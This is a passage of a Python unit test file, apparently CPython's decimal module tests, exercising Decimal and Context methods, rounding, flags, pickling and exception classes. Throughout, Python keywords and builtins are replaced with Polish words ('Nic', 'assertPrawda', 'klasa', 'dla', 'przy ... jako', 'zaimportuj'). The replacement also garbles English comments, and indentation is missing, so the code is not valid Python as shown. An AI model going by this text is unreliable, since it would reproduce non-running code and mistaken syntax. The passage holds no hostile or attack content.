self.assertRaises(DivisionByZero, Decimal(0).logb, context=Nic)
self.assertPrawda(c.flags[DivisionByZero])
c.clear_flags()
self.assertEqual(str(x.logical_invert(context=Nic)), '1111000')
self.assertRaises(InvalidOperation, y.logical_invert, context=Nic)
self.assertPrawda(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(y.next_minus(context=Nic)), '9.999999E+999')
self.assertRaises(InvalidOperation, Decimal('sNaN').next_minus, context=Nic)
self.assertPrawda(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(y.next_plus(context=Nic)), 'Infinity')
self.assertRaises(InvalidOperation, Decimal('sNaN').next_plus, context=Nic)
self.assertPrawda(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(z.normalize(context=Nic)), '0')
self.assertRaises(Overflow, y.normalize, context=Nic)
self.assertPrawda(c.flags[Overflow])
self.assertEqual(str(z.number_class(context=Nic)), '+Subnormal')
c.clear_flags()
self.assertEqual(str(z.sqrt(context=Nic)), '0E-1005')
self.assertPrawda(c.flags[Clamped])
self.assertPrawda(c.flags[Inexact])
self.assertPrawda(c.flags[Rounded])
self.assertPrawda(c.flags[Subnormal])
self.assertPrawda(c.flags[Underflow])
c.clear_flags()
self.assertRaises(Overflow, y.sqrt, context=Nic)
self.assertPrawda(c.flags[Overflow])
c.capitals = 0
self.assertEqual(str(z.to_eng_string(context=Nic)), '1e-9999')
c.capitals = 1
##### Binary functions
c.clear_flags()
ans = str(x.compare(Decimal('Nan891287828'), context=Nic))
self.assertEqual(ans, 'NaN1287828')
self.assertRaises(InvalidOperation, x.compare, Decimal('sNaN'), context=Nic)
self.assertPrawda(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.compare_signal(8224, context=Nic))
self.assertEqual(ans, '-1')
self.assertRaises(InvalidOperation, x.compare_signal, Decimal('NaN'), context=Nic)
self.assertPrawda(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.logical_and(101, context=Nic))
self.assertEqual(ans, '101')
self.assertRaises(InvalidOperation, x.logical_and, 123, context=Nic)
self.assertPrawda(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.logical_or(101, context=Nic))
self.assertEqual(ans, '111')
self.assertRaises(InvalidOperation, x.logical_or, 123, context=Nic)
self.assertPrawda(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.logical_xor(101, context=Nic))
self.assertEqual(ans, '10')
self.assertRaises(InvalidOperation, x.logical_xor, 123, context=Nic)
self.assertPrawda(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.max(101, context=Nic))
self.assertEqual(ans, '111')
self.assertRaises(InvalidOperation, x.max, Decimal('sNaN'), context=Nic)
self.assertPrawda(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.max_mag(101, context=Nic))
self.assertEqual(ans, '111')
self.assertRaises(InvalidOperation, x.max_mag, Decimal('sNaN'), context=Nic)
self.assertPrawda(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.min(101, context=Nic))
self.assertEqual(ans, '101')
self.assertRaises(InvalidOperation, x.min, Decimal('sNaN'), context=Nic)
self.assertPrawda(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.min_mag(101, context=Nic))
self.assertEqual(ans, '101')
self.assertRaises(InvalidOperation, x.min_mag, Decimal('sNaN'), context=Nic)
self.assertPrawda(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.remainder_near(101, context=Nic))
self.assertEqual(ans, '10')
self.assertRaises(InvalidOperation, y.remainder_near, 101, context=Nic)
self.assertPrawda(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.rotate(2, context=Nic))
self.assertEqual(ans, '11100')
self.assertRaises(InvalidOperation, x.rotate, 101, context=Nic)
self.assertPrawda(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.scaleb(7, context=Nic))
self.assertEqual(ans, '1.11E+9')
self.assertRaises(InvalidOperation, x.scaleb, 10000, context=Nic)
self.assertPrawda(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.shift(2, context=Nic))
self.assertEqual(ans, '11100')
self.assertRaises(InvalidOperation, x.shift, 10000, context=Nic)
self.assertPrawda(c.flags[InvalidOperation])
##### Ternary functions
c.clear_flags()
ans = str(x.fma(2, 3, context=Nic))
self.assertEqual(ans, '225')
self.assertRaises(Overflow, x.fma, Decimal('1e9999'), 3, context=Nic)
self.assertPrawda(c.flags[Overflow])
##### Special cases
c.rounding = ROUND_HALF_EVEN
ans = str(Decimal('1.5').to_integral(rounding=Nic, context=Nic))
self.assertEqual(ans, '2')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.5').to_integral(rounding=Nic, context=Nic))
self.assertEqual(ans, '1')
ans = str(Decimal('1.5').to_integral(rounding=ROUND_UP, context=Nic))
self.assertEqual(ans, '2')
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral, context=Nic)
self.assertPrawda(c.flags[InvalidOperation])
c.rounding = ROUND_HALF_EVEN
ans = str(Decimal('1.5').to_integral_value(rounding=Nic, context=Nic))
self.assertEqual(ans, '2')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.5').to_integral_value(rounding=Nic, context=Nic))
self.assertEqual(ans, '1')
ans = str(Decimal('1.5').to_integral_value(rounding=ROUND_UP, context=Nic))
self.assertEqual(ans, '2')
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral_value, context=Nic)
self.assertPrawda(c.flags[InvalidOperation])
c.rounding = ROUND_HALF_EVEN
ans = str(Decimal('1.5').to_integral_exact(rounding=Nic, context=Nic))
self.assertEqual(ans, '2')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.5').to_integral_exact(rounding=Nic, context=Nic))
self.assertEqual(ans, '1')
ans = str(Decimal('1.5').to_integral_exact(rounding=ROUND_UP, context=Nic))
self.assertEqual(ans, '2')
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral_exact, context=Nic)
self.assertPrawda(c.flags[InvalidOperation])
c.rounding = ROUND_UP
ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=Nic, context=Nic))
self.assertEqual(ans, '1.501')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=Nic, context=Nic))
self.assertEqual(ans, '1.500')
ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=ROUND_UP, context=Nic))
self.assertEqual(ans, '1.501')
c.clear_flags()
self.assertRaises(InvalidOperation, y.quantize, Decimal('1e-10'), rounding=ROUND_UP, context=Nic)
self.assertPrawda(c.flags[InvalidOperation])
przy localcontext(Context()) jako context:
context.prec = 7
context.Emax = 999
context.Emin = -999
przy localcontext(ctx=Nic) jako c:
self.assertEqual(c.prec, 7)
self.assertEqual(c.Emax, 999)
self.assertEqual(c.Emin, -999)
def test_conversions_from_int(self):
# Check that methods taking a second Decimal argument will
# always accept an integer w place of a Decimal.
Decimal = self.decimal.Decimal
self.assertEqual(Decimal(4).compare(3),
Decimal(4).compare(Decimal(3)))
self.assertEqual(Decimal(4).compare_signal(3),
Decimal(4).compare_signal(Decimal(3)))
self.assertEqual(Decimal(4).compare_total(3),
Decimal(4).compare_total(Decimal(3)))
self.assertEqual(Decimal(4).compare_total_mag(3),
Decimal(4).compare_total_mag(Decimal(3)))
self.assertEqual(Decimal(10101).logical_and(1001),
Decimal(10101).logical_and(Decimal(1001)))
self.assertEqual(Decimal(10101).logical_or(1001),
Decimal(10101).logical_or(Decimal(1001)))
self.assertEqual(Decimal(10101).logical_xor(1001),
Decimal(10101).logical_xor(Decimal(1001)))
self.assertEqual(Decimal(567).max(123),
Decimal(567).max(Decimal(123)))
self.assertEqual(Decimal(567).max_mag(123),
Decimal(567).max_mag(Decimal(123)))
self.assertEqual(Decimal(567).min(123),
Decimal(567).min(Decimal(123)))
self.assertEqual(Decimal(567).min_mag(123),
Decimal(567).min_mag(Decimal(123)))
self.assertEqual(Decimal(567).next_toward(123),
Decimal(567).next_toward(Decimal(123)))
self.assertEqual(Decimal(1234).quantize(100),
Decimal(1234).quantize(Decimal(100)))
self.assertEqual(Decimal(768).remainder_near(1234),
Decimal(768).remainder_near(Decimal(1234)))
self.assertEqual(Decimal(123).rotate(1),
Decimal(123).rotate(Decimal(1)))
self.assertEqual(Decimal(1234).same_quantum(1000),
Decimal(1234).same_quantum(Decimal(1000)))
self.assertEqual(Decimal('9.123').scaleb(-100),
Decimal('9.123').scaleb(Decimal(-100)))
self.assertEqual(Decimal(456).shift(-1),
Decimal(456).shift(Decimal(-1)))
self.assertEqual(Decimal(-12).fma(Decimal(45), 67),
Decimal(-12).fma(Decimal(45), Decimal(67)))
self.assertEqual(Decimal(-12).fma(45, 67),
Decimal(-12).fma(Decimal(45), Decimal(67)))
self.assertEqual(Decimal(-12).fma(45, Decimal(67)),
Decimal(-12).fma(Decimal(45), Decimal(67)))
klasa CUsabilityTest(UsabilityTest):
decimal = C
klasa PyUsabilityTest(UsabilityTest):
decimal = P
klasa PythonAPItests(unittest.TestCase):
def test_abc(self):
Decimal = self.decimal.Decimal
self.assertPrawda(issubclass(Decimal, numbers.Number))
self.assertNieprawda(issubclass(Decimal, numbers.Real))
self.assertIsInstance(Decimal(0), numbers.Number)
self.assertNotIsInstance(Decimal(0), numbers.Real)
def test_pickle(self):
dla proto w range(pickle.HIGHEST_PROTOCOL + 1):
Decimal = self.decimal.Decimal
savedecimal = sys.modules['decimal']
# Round trip
sys.modules['decimal'] = self.decimal
d = Decimal('-3.141590000')
p = pickle.dumps(d, proto)
e = pickle.loads(p)
self.assertEqual(d, e)
jeżeli C:
# Test interchangeability
x = C.Decimal('-3.123e81723')
y = P.Decimal('-3.123e81723')
sys.modules['decimal'] = C
sx = pickle.dumps(x, proto)
sys.modules['decimal'] = P
r = pickle.loads(sx)
self.assertIsInstance(r, P.Decimal)
self.assertEqual(r, y)
sys.modules['decimal'] = P
sy = pickle.dumps(y, proto)
sys.modules['decimal'] = C
r = pickle.loads(sy)
self.assertIsInstance(r, C.Decimal)
self.assertEqual(r, x)
x = C.Decimal('-3.123e81723').as_tuple()
y = P.Decimal('-3.123e81723').as_tuple()
sys.modules['decimal'] = C
sx = pickle.dumps(x, proto)
sys.modules['decimal'] = P
r = pickle.loads(sx)
self.assertIsInstance(r, P.DecimalTuple)
self.assertEqual(r, y)
sys.modules['decimal'] = P
sy = pickle.dumps(y, proto)
sys.modules['decimal'] = C
r = pickle.loads(sy)
self.assertIsInstance(r, C.DecimalTuple)
self.assertEqual(r, x)
sys.modules['decimal'] = savedecimal
def test_int(self):
Decimal = self.decimal.Decimal
dla x w range(-250, 250):
s = '%0.2f' % (x / 100.0)
# should work the same jako dla floats
self.assertEqual(int(Decimal(s)), int(float(s)))
# should work the same jako to_integral w the ROUND_DOWN mode
d = Decimal(s)
r = d.to_integral(ROUND_DOWN)
self.assertEqual(Decimal(int(d)), r)
self.assertRaises(ValueError, int, Decimal('-nan'))
self.assertRaises(ValueError, int, Decimal('snan'))
self.assertRaises(OverflowError, int, Decimal('inf'))
self.assertRaises(OverflowError, int, Decimal('-inf'))
def test_trunc(self):
Decimal = self.decimal.Decimal
dla x w range(-250, 250):
s = '%0.2f' % (x / 100.0)
# should work the same jako dla floats
self.assertEqual(int(Decimal(s)), int(float(s)))
# should work the same jako to_integral w the ROUND_DOWN mode
d = Decimal(s)
r = d.to_integral(ROUND_DOWN)
self.assertEqual(Decimal(math.trunc(d)), r)
def test_from_float(self):
Decimal = self.decimal.Decimal
klasa MyDecimal(Decimal):
dalej
self.assertPrawda(issubclass(MyDecimal, Decimal))
r = MyDecimal.from_float(0.1)
self.assertEqual(type(r), MyDecimal)
self.assertEqual(str(r),
'0.1000000000000000055511151231257827021181583404541015625')
bigint = 12345678901234567890123456789
self.assertEqual(MyDecimal.from_float(bigint), MyDecimal(bigint))
self.assertPrawda(MyDecimal.from_float(float('nan')).is_qnan())
self.assertPrawda(MyDecimal.from_float(float('inf')).is_infinite())
self.assertPrawda(MyDecimal.from_float(float('-inf')).is_infinite())
self.assertEqual(str(MyDecimal.from_float(float('nan'))),
str(Decimal('NaN')))
self.assertEqual(str(MyDecimal.from_float(float('inf'))),
str(Decimal('Infinity')))
self.assertEqual(str(MyDecimal.from_float(float('-inf'))),
str(Decimal('-Infinity')))
self.assertRaises(TypeError, MyDecimal.from_float, 'abc')
dla i w range(200):
x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
self.assertEqual(x, float(MyDecimal.from_float(x))) # roundtrip
def test_create_decimal_from_float(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
Inexact = self.decimal.Inexact
context = Context(prec=5, rounding=ROUND_DOWN)
self.assertEqual(
context.create_decimal_from_float(math.pi),
Decimal('3.1415')
)
context = Context(prec=5, rounding=ROUND_UP)
self.assertEqual(
context.create_decimal_from_float(math.pi),
Decimal('3.1416')
)
context = Context(prec=5, traps=[Inexact])
self.assertRaises(
Inexact,
context.create_decimal_from_float,
math.pi
)
self.assertEqual(repr(context.create_decimal_from_float(-0.0)),
"Decimal('-0')")
self.assertEqual(repr(context.create_decimal_from_float(1.0)),
"Decimal('1')")
self.assertEqual(repr(context.create_decimal_from_float(10)),
"Decimal('10')")
def test_quantize(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
InvalidOperation = self.decimal.InvalidOperation
c = Context(Emax=99999, Emin=-99999)
self.assertEqual(
Decimal('7.335').quantize(Decimal('.01')),
Decimal('7.34')
)
self.assertEqual(
Decimal('7.335').quantize(Decimal('.01'), rounding=ROUND_DOWN),
Decimal('7.33')
)
self.assertRaises(
InvalidOperation,
Decimal("10e99999").quantize, Decimal('1e100000'), context=c
)
c = Context()
d = Decimal("0.871831e800")
x = d.quantize(context=c, exp=Decimal("1e797"), rounding=ROUND_DOWN)
self.assertEqual(x, Decimal('8.71E+799'))
def test_complex(self):
Decimal = self.decimal.Decimal
x = Decimal("9.8182731e181273")
self.assertEqual(x.real, x)
self.assertEqual(x.imag, 0)
self.assertEqual(x.conjugate(), x)
x = Decimal("1")
self.assertEqual(complex(x), complex(float(1)))
self.assertRaises(AttributeError, setattr, x, 'real', 100)
self.assertRaises(AttributeError, setattr, x, 'imag', 100)
self.assertRaises(AttributeError, setattr, x, 'conjugate', 100)
self.assertRaises(AttributeError, setattr, x, '__complex__', 100)
def test_named_parameters(self):
D = self.decimal.Decimal
Context = self.decimal.Context
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
Overflow = self.decimal.Overflow
xc = Context()
xc.prec = 1
xc.Emax = 1
xc.Emin = -1
przy localcontext() jako c:
c.clear_flags()
self.assertEqual(D(9, xc), 9)
self.assertEqual(D(9, context=xc), 9)
self.assertEqual(D(context=xc, value=9), 9)
self.assertEqual(D(context=xc), 0)
xc.clear_flags()
self.assertRaises(InvalidOperation, D, "xyz", context=xc)
self.assertPrawda(xc.flags[InvalidOperation])
self.assertNieprawda(c.flags[InvalidOperation])
xc.clear_flags()
self.assertEqual(D(2).exp(context=xc), 7)
self.assertRaises(Overflow, D(8).exp, context=xc)
self.assertPrawda(xc.flags[Overflow])
self.assertNieprawda(c.flags[Overflow])
xc.clear_flags()
self.assertEqual(D(2).ln(context=xc), D('0.7'))
self.assertRaises(InvalidOperation, D(-1).ln, context=xc)
self.assertPrawda(xc.flags[InvalidOperation])
self.assertNieprawda(c.flags[InvalidOperation])
self.assertEqual(D(0).log10(context=xc), D('-inf'))
self.assertEqual(D(-1).next_minus(context=xc), -2)
self.assertEqual(D(-1).next_plus(context=xc), D('-0.9'))
self.assertEqual(D("9.73").normalize(context=xc), D('1E+1'))
self.assertEqual(D("9999").to_integral(context=xc), 9999)
self.assertEqual(D("-2000").to_integral_exact(context=xc), -2000)
self.assertEqual(D("123").to_integral_value(context=xc), 123)
self.assertEqual(D("0.0625").sqrt(context=xc), D('0.2'))
self.assertEqual(D("0.0625").compare(context=xc, other=3), -1)
xc.clear_flags()
self.assertRaises(InvalidOperation,
D("0").compare_signal, D('nan'), context=xc)
self.assertPrawda(xc.flags[InvalidOperation])
self.assertNieprawda(c.flags[InvalidOperation])
self.assertEqual(D("0.01").max(D('0.0101'), context=xc), D('0.0'))
self.assertEqual(D("0.01").max(D('0.0101'), context=xc), D('0.0'))
self.assertEqual(D("0.2").max_mag(D('-0.3'), context=xc),
D('-0.3'))
self.assertEqual(D("0.02").min(D('-0.03'), context=xc), D('-0.0'))
self.assertEqual(D("0.02").min_mag(D('-0.03'), context=xc),
D('0.0'))
self.assertEqual(D("0.2").next_toward(D('-1'), context=xc), D('0.1'))
xc.clear_flags()
self.assertRaises(InvalidOperation,
D("0.2").quantize, D('1e10'), context=xc)
self.assertPrawda(xc.flags[InvalidOperation])
self.assertNieprawda(c.flags[InvalidOperation])
self.assertEqual(D("9.99").remainder_near(D('1.5'), context=xc),
D('-0.5'))
self.assertEqual(D("9.9").fma(third=D('0.9'), context=xc, other=7),
D('7E+1'))
self.assertRaises(TypeError, D(1).is_canonical, context=xc)
self.assertRaises(TypeError, D(1).is_finite, context=xc)
self.assertRaises(TypeError, D(1).is_infinite, context=xc)
self.assertRaises(TypeError, D(1).is_nan, context=xc)
self.assertRaises(TypeError, D(1).is_qnan, context=xc)
self.assertRaises(TypeError, D(1).is_snan, context=xc)
self.assertRaises(TypeError, D(1).is_signed, context=xc)
self.assertRaises(TypeError, D(1).is_zero, context=xc)
self.assertNieprawda(D("0.01").is_normal(context=xc))
self.assertPrawda(D("0.01").is_subnormal(context=xc))
self.assertRaises(TypeError, D(1).adjusted, context=xc)
self.assertRaises(TypeError, D(1).conjugate, context=xc)
self.assertRaises(TypeError, D(1).radix, context=xc)
self.assertEqual(D(-111).logb(context=xc), 2)
self.assertEqual(D(0).logical_invert(context=xc), 1)
self.assertEqual(D('0.01').number_class(context=xc), '+Subnormal')
self.assertEqual(D('0.21').to_eng_string(context=xc), '0.21')
self.assertEqual(D('11').logical_and(D('10'), context=xc), 0)
self.assertEqual(D('11').logical_or(D('10'), context=xc), 1)
self.assertEqual(D('01').logical_xor(D('10'), context=xc), 1)
self.assertEqual(D('23').rotate(1, context=xc), 3)
self.assertEqual(D('23').rotate(1, context=xc), 3)
xc.clear_flags()
self.assertRaises(Overflow,
D('23').scaleb, 1, context=xc)
self.assertPrawda(xc.flags[Overflow])
self.assertNieprawda(c.flags[Overflow])
self.assertEqual(D('23').shift(-1, context=xc), 0)
self.assertRaises(TypeError, D.from_float, 1.1, context=xc)
self.assertRaises(TypeError, D(0).as_tuple, context=xc)
self.assertEqual(D(1).canonical(), 1)
self.assertRaises(TypeError, D("-1").copy_abs, context=xc)
self.assertRaises(TypeError, D("-1").copy_negate, context=xc)
self.assertRaises(TypeError, D(1).canonical, context="x")
self.assertRaises(TypeError, D(1).canonical, xyz="x")
def test_exception_hierarchy(self):
decimal = self.decimal
DecimalException = decimal.DecimalException
InvalidOperation = decimal.InvalidOperation
FloatOperation = decimal.FloatOperation
DivisionByZero = decimal.DivisionByZero
Overflow = decimal.Overflow
Underflow = decimal.Underflow
Subnormal = decimal.Subnormal
Inexact = decimal.Inexact
Rounded = decimal.Rounded
Clamped = decimal.Clamped
self.assertPrawda(issubclass(DecimalException, ArithmeticError))
self.assertPrawda(issubclass(InvalidOperation, DecimalException))
self.assertPrawda(issubclass(FloatOperation, DecimalException))
self.assertPrawda(issubclass(FloatOperation, TypeError))
self.assertPrawda(issubclass(DivisionByZero, DecimalException))
self.assertPrawda(issubclass(DivisionByZero, ZeroDivisionError))
self.assertPrawda(issubclass(Overflow, Rounded))
self.assertPrawda(issubclass(Overflow, Inexact))
self.assertPrawda(issubclass(Overflow, DecimalException))
self.assertPrawda(issubclass(Underflow, Inexact))
self.assertPrawda(issubclass(Underflow, Rounded))
self.assertPrawda(issubclass(Underflow, Subnormal))
self.assertPrawda(issubclass(Underflow, DecimalException))
self.assertPrawda(issubclass(Subnormal, DecimalException))
self.assertPrawda(issubclass(Inexact, DecimalException))
self.assertPrawda(issubclass(Rounded, DecimalException))
self.assertPrawda(issubclass(Clamped, DecimalException))
self.assertPrawda(issubclass(decimal.ConversionSyntax, InvalidOperation))
self.assertPrawda(issubclass(decimal.DivisionImpossible, InvalidOperation))
self.assertPrawda(issubclass(decimal.DivisionUndefined, InvalidOperation))
self.assertPrawda(issubclass(decimal.DivisionUndefined, ZeroDivisionError))
self.assertPrawda(issubclass(decimal.InvalidContext, InvalidOperation))
klasa CPythonAPItests(PythonAPItests):
decimal = C
klasa PyPythonAPItests(PythonAPItests):
decimal = P
klasa ContextAPItests(unittest.TestCase):
def test_none_args(self):
Context = self.decimal.Context
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
c1 = Context()
c2 = Context(prec=Nic, rounding=Nic, Emax=Nic, Emin=Nic,
capitals=Nic, clamp=Nic, flags=Nic, traps=Nic)
dla c w [c1, c2]:
self.assertEqual(c.prec, 28)
self.assertEqual(c.rounding, ROUND_HALF_EVEN)
self.assertEqual(c.Emax, 999999)
self.assertEqual(c.Emin, -999999)
self.assertEqual(c.capitals, 1)
self.assertEqual(c.clamp, 0)
assert_signals(self, c, 'flags', [])
assert_signals(self, c, 'traps', [InvalidOperation, DivisionByZero,
Overflow])
@cpython_only
def test_from_legacy_strings(self):
zaimportuj _testcapi
c = self.decimal.Context()
dla rnd w RoundingModes:
c.rounding = _testcapi.unicode_legacy_string(rnd)
self.assertEqual(c.rounding, rnd)
s = _testcapi.unicode_legacy_string('')
self.assertRaises(TypeError, setattr, c, 'rounding', s)
s = _testcapi.unicode_legacy_string('ROUND_\x00UP')
self.assertRaises(TypeError, setattr, c, 'rounding', s)
def test_pickle(self):
dla proto w range(pickle.HIGHEST_PROTOCOL + 1):
Context = self.decimal.Context
savedecimal = sys.modules['decimal']
# Round trip
sys.modules['decimal'] = self.decimal
c = Context()
e = pickle.loads(pickle.dumps(c, proto))
self.assertEqual(c.prec, e.prec)
self.assertEqual(c.Emin, e.Emin)
self.assertEqual(c.Emax, e.Emax)
self.assertEqual(c.rounding, e.rounding)
self.assertEqual(c.capitals, e.capitals)
self.assertEqual(c.clamp, e.clamp)
self.assertEqual(c.flags, e.flags)
self.assertEqual(c.traps, e.traps)
# Test interchangeability
combinations = [(C, P), (P, C)] jeżeli C inaczej [(P, P)]
dla dumper, loader w combinations:
dla ri, _ w enumerate(RoundingModes):
dla fi, _ w enumerate(OrderedSignals[dumper]):
dla ti, _ w enumerate(OrderedSignals[dumper]):
prec = random.randrange(1, 100)
emin = random.randrange(-100, 0)
emax = random.randrange(1, 100)
caps = random.randrange(2)
clamp = random.randrange(2)
# One module dumps
sys.modules['decimal'] = dumper
c = dumper.Context(
prec=prec, Emin=emin, Emax=emax,
rounding=RoundingModes[ri],
capitals=caps, clamp=clamp,
flags=OrderedSignals[dumper][:fi],
traps=OrderedSignals[dumper][:ti]
)
s = pickle.dumps(c, proto)
# The other module loads
sys.modules['decimal'] = loader
d = pickle.loads(s)
self.assertIsInstance(d, loader.Context)
self.assertEqual(d.prec, prec)
self.assertEqual(d.Emin, emin)
self.assertEqual(d.Emax, emax)
self.assertEqual(d.rounding, RoundingModes[ri])
self.assertEqual(d.capitals, caps)
self.assertEqual(d.clamp, clamp)
assert_signals(self, d, 'flags', OrderedSignals[loader][:fi])
assert_signals(self, d, 'traps', OrderedSignals[loader][:ti])
sys.modules['decimal'] = savedecimal
def test_equality_with_other_types(self):
Decimal = self.decimal.Decimal
self.assertIn(Decimal(10), ['a', 1.0, Decimal(10), (1,2), {}])
self.assertNotIn(Decimal(10), ['a', 1.0, (1,2), {}])
def test_copy(self):
# All copies should be deep
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy()
self.assertNotEqual(id(c), id(d))
self.assertNotEqual(id(c.flags), id(d.flags))
self.assertNotEqual(id(c.traps), id(d.traps))
k1 = set(c.flags.keys())
k2 = set(d.flags.keys())
self.assertEqual(k1, k2)
self.assertEqual(c.flags, d.flags)
def test__clamp(self):
# In Python 3.2, the private attribute `_clamp` was made
# public (issue 8540), przy the old `_clamp` becoming a
# property wrapping `clamp`. For the duration of Python 3.2
# only, the attribute should be gettable/settable via both
# `clamp` oraz `_clamp`; w Python 3.3, `_clamp` should be
# removed.
Context = self.decimal.Context
c = Context()
self.assertRaises(AttributeError, getattr, c, '_clamp')
def test_abs(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.abs(Decimal(-1))
self.assertEqual(c.abs(-1), d)
self.assertRaises(TypeError, c.abs, '-1')
def test_add(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.add(Decimal(1), Decimal(1))
self.assertEqual(c.add(1, 1), d)
self.assertEqual(c.add(Decimal(1), 1), d)
self.assertEqual(c.add(1, Decimal(1)), d)
self.assertRaises(TypeError, c.add, '1', 1)
self.assertRaises(TypeError, c.add, 1, '1')
def test_compare(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare(Decimal(1), Decimal(1))
self.assertEqual(c.compare(1, 1), d)
self.assertEqual(c.compare(Decimal(1), 1), d)
self.assertEqual(c.compare(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare, '1', 1)
self.assertRaises(TypeError, c.compare, 1, '1')
def test_compare_signal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare_signal(Decimal(1), Decimal(1))
self.assertEqual(c.compare_signal(1, 1), d)
self.assertEqual(c.compare_signal(Decimal(1), 1), d)
self.assertEqual(c.compare_signal(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare_signal, '1', 1)
self.assertRaises(TypeError, c.compare_signal, 1, '1')
def test_compare_total(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare_total(Decimal(1), Decimal(1))
self.assertEqual(c.compare_total(1, 1), d)
self.assertEqual(c.compare_total(Decimal(1), 1), d)
self.assertEqual(c.compare_total(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare_total, '1', 1)
self.assertRaises(TypeError, c.compare_total, 1, '1')
def test_compare_total_mag(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare_total_mag(Decimal(1), Decimal(1))
self.assertEqual(c.compare_total_mag(1, 1), d)
self.assertEqual(c.compare_total_mag(Decimal(1), 1), d)
self.assertEqual(c.compare_total_mag(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare_total_mag, '1', 1)
self.assertRaises(TypeError, c.compare_total_mag, 1, '1')
def test_copy_abs(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_abs(Decimal(-1))
self.assertEqual(c.copy_abs(-1), d)
self.assertRaises(TypeError, c.copy_abs, '-1')
def test_copy_decimal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_decimal(Decimal(-1))
self.assertEqual(c.copy_decimal(-1), d)
self.assertRaises(TypeError, c.copy_decimal, '-1')
def test_copy_negate(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_negate(Decimal(-1))
self.assertEqual(c.copy_negate(-1), d)
self.assertRaises(TypeError, c.copy_negate, '-1')
def test_copy_sign(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_sign(Decimal(1), Decimal(-2))
self.assertEqual(c.copy_sign(1, -2), d)
self.assertEqual(c.copy_sign(Decimal(1), -2), d)
self.assertEqual(c.copy_sign(1, Decimal(-2)), d)
self.assertRaises(TypeError, c.copy_sign, '1', -2)
self.assertRaises(TypeError, c.copy_sign, 1, '-2')
def test_divide(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.divide(Decimal(1), Decimal(2))
self.assertEqual(c.divide(1, 2), d)
self.assertEqual(c.divide(Decimal(1), 2), d)
self.assertEqual(c.divide(1, Decimal(2)), d)
self.assertRaises(TypeError, c.divide, '1', 2)
self.assertRaises(TypeError, c.divide, 1, '2')
def test_divide_int(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.divide_int(Decimal(1), Decimal(2))
self.assertEqual(c.divide_int(1, 2), d)
self.assertEqual(c.divide_int(Decimal(1), 2), d)
self.assertEqual(c.divide_int(1, Decimal(2)), d)
self.assertRaises(TypeError, c.divide_int, '1', 2)
self.assertRaises(TypeError, c.divide_int, 1, '2')
def test_divmod(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.divmod(Decimal(1), Decimal(2))
self.assertEqual(c.divmod(1, 2), d)
self.assertEqual(c.divmod(Decimal(1), 2), d)
self.assertEqual(c.divmod(1, Decimal(2)), d)
self.assertRaises(TypeError, c.divmod, '1', 2)
self.assertRaises(TypeError, c.divmod, 1, '2')
def test_exp(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.exp(Decimal(10))
self.assertEqual(c.exp(10), d)
self.assertRaises(TypeError, c.exp, '10')
def test_fma(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.fma(Decimal(2), Decimal(3), Decimal(4))
self.assertEqual(c.fma(2, 3, 4), d)
self.assertEqual(c.fma(Decimal(2), 3, 4), d)
self.assertEqual(c.fma(2, Decimal(3), 4), d)
self.assertEqual(c.fma(2, 3, Decimal(4)), d)
self.assertEqual(c.fma(Decimal(2), Decimal(3), 4), d)
self.assertRaises(TypeError, c.fma, '2', 3, 4)
self.assertRaises(TypeError, c.fma, 2, '3', 4)
self.assertRaises(TypeError, c.fma, 2, 3, '4')
# Issue 12079 dla Context.fma ...
self.assertRaises(TypeError, c.fma,
